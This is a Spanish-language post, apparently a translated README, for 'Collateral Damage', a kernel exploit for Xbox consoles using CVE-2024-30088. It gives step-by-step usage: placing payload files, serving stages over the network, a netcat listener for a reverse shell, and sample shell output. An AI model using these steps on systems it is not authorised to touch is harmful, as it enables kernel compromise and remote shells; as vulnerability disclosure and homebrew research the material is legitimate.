Por
Dekuwa
Collateral Damage es un exploit del kernel para Xbox SystemOS que utiliza CVE-2024-30088. Está dirigido a las consolas Xbox One y Xbox Series que ejecutan las versiones del kernel 25398.4478, 25398.4908 y 25398.4909. El punto de entrada inicial es a través de la aplicación Game Script UWP.
Los payloads de la primera etapa, PE loader y network loader son proporcionados por Solstice.
Este exploit ha sido desarrollado por Emma Kirkpatrick (descubrimiento y explotación de vulnerabilidades) y Lander Brandt (Solstice).
Advertencias importantes
Para colocar el payload localmente en la consola Xbox se recomienda un explorador de plena confianza como Adv File Explorer. Alternativamente, el payload inicial puede ser servido a través de un simulador de teclado USB (patito de goma, etc.) y las etapas posteriores del payload pueden ser cargadas a través de la red.
El ejemplo de shell inverso que se proporciona aquí requiere que la consola esté conectada a una red. Cuando conectes tu consola a una red ten mucho cuidado para evitar conectarte a internet y actualizar. Intenta bloquear la conectividad a Xbox LIVE en la medida de lo posible, como mínimo configurando tus DNS a servidores no válidos.
Este exploit no es totalmente fiable. Se basa en un canal lateral de la CPU, así como en una condición de carrera, y ambos tienen el potencial de fallar. En caso de fallo, el exploit puede avisarte de que ha fallado a través de la salida de red, o la propia consola puede bloquearse y reiniciarse.
Uso del exploit
Modifica la línea 7 de gamescript_autosave_network.txt o gamescript_autosave.txt para que contenga la IP local de tu PC.
Para utilizar con la aplicación Explorador de archivos de confianza total: Copie gamescript_autosave.txt, stage2.bin y run.exe en el directorio LocalState de la aplicación Game Script de su consola (Q:\Users\UserMgr0\AppData\Local\Packages\27878ConstantineTarasenko.458004FD2C47C_c8b3w9r5va522\LocalState).
Para la entrada del simulador HID / Teclado: Escriba el contenido de gamescript_autosave_network.txt en la ventana de GameScript. Servir stage2.bin y run.exe a través de payload_server_win_x64.exe --stage2 stage2.bin --run run.exe
Escucha en el puerto 7070 de tu PC utilizando netcat o una herramienta similar (ejemplo de comando: nc64.exe -lvnp 7070)
Abra la aplicación Game Script en su consola y seleccione "Mostrar ventana de ejecución de código" y haga clic en "Ejecutar código una vez"
Si el exploit tiene éxito deberías ver una salida en tu PC parecida a la siguiente:
listening on [any] 7070 ...
connect to [192.168.0.61] from (UNKNOWN) [192.168.0.130] 49665
Collateral Damage - @carrot_c4k3 & @landaire (exploits.forsale)
Build number: 25398.4478
Attempting to find kernel base...
Found likely kernel base: FFFFF80AF9800000
Attempting exploit...
Exploit succeeded! Running payload!
Microsoft Windows [Version 10.0.25398.4478]
Copyright (c) Microsoft Corporation. All rights reserved.
S:\>
Collateral Damage ha sido creado por exploits-forsale.